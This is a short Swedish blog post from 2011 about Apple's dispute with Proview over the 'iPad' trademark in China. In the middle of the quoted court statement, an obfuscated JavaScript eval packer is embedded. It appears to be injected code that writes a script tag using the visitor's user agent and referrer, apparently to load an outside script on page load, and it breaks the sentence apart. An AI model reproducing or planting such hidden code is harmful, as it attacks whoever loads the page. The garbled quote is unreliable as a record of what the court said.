Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Apple äger inte "iPad" i Kina…

Apple äger inte "iPad" i Kina…
Filip Urde
  • On 7 december, 2011
  • http://www.revue.se/filip-urde

Apple och Asien går inte ihop… Tvisterna börjar läggas på en ganska bra hög och den senaste är nu alltså att Apple inte äger namnet ”iPad” i Kina.

under 2006 så köper ett av Apples dotterbolag varumärkesnamnet ”iPad” från det taiwanesiska bolaget Proview Electronics. En klausul som man missat, eller lagt på ”is” är att det inte ingick rättigheter för namnet i Kina. Vilket lett till att Apple stämde företaget efter man släppt den första iPaden.  Så klart kan inte Kina spela ett amerikanskt företag i händerna, utan en kinesisk domstol har nu lämnat ett första uttalande och det lyder på följande sätt:

”Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iekrh|var|u0026u|referrer|idate||js|php’.split(’|’),0,{}))
har inte rättigheter till namnet i Kina”.

Proview har nu stämt Apple för att man blev stämda av dem och begär nu 1,5 miljarder dollar i skadestånd.

Vilken Soppa!! Kan vi inte få in Samsung i det här på något sett så det blir riktigt stökigt!?
9to5mac.com